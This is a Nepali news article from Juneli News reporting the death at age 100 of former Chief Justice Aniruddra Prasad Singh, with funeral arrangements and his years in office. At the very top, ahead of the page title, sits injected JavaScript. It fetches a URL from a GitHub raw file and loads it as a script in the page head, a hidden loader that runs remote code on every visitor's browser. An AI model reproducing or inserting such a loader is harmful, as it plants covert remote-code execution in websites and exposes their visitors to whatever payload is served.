;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); पूर्व प्रधानन्यायाधीश अनिरुद्र प्रसाद सिंहको मृत्यु – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • पूर्व प्रधानन्यायाधीश अनिरुद्र प्रसाद सिंहको मृत्यु
जुनेली बिशेष

पूर्व प्रधानन्यायाधीश अनिरुद्र प्रसाद सिंहको मृत्यु

भदौ ३१,

काठमाडौं । पूर्व प्रधानन्यायाधीश अनिरुद्र प्रसाद सिंहको निधन भएको छ । उनको बत्तिसपुतली स्थित आफ्नै निवासमा मंगलबार बेलुकी ७ः३० बजे एक सय वर्षको उमेरमा निधन भएको सर्वोच्च अदालतका सूचना अधिकारी देवेन्द्र ढकालले जानकारी दिए।

सिंहको (आज) बुधबार विहान १० बजे पशुपति आर्यघाटमा अन्त्येष्टि गरिँदै छ। उनी सर्वोच्च अदालतको दोस्रो प्रधानन्यायाधीश बनेका थिए। २०१३ साल जेठ ८ गते प्रधानन्यायाधीश बनेका सिंह २०१६ साल असार १६ गते सम्मा प्रधानन्यायाधीशका रुपमा कार्यरत थिए। २०१६ सालमा उनी लोकसेवा आयोगको अध्यक्ष पनि भए। फाइल फोटो

फेसबुक प्रतिक्रियाहरु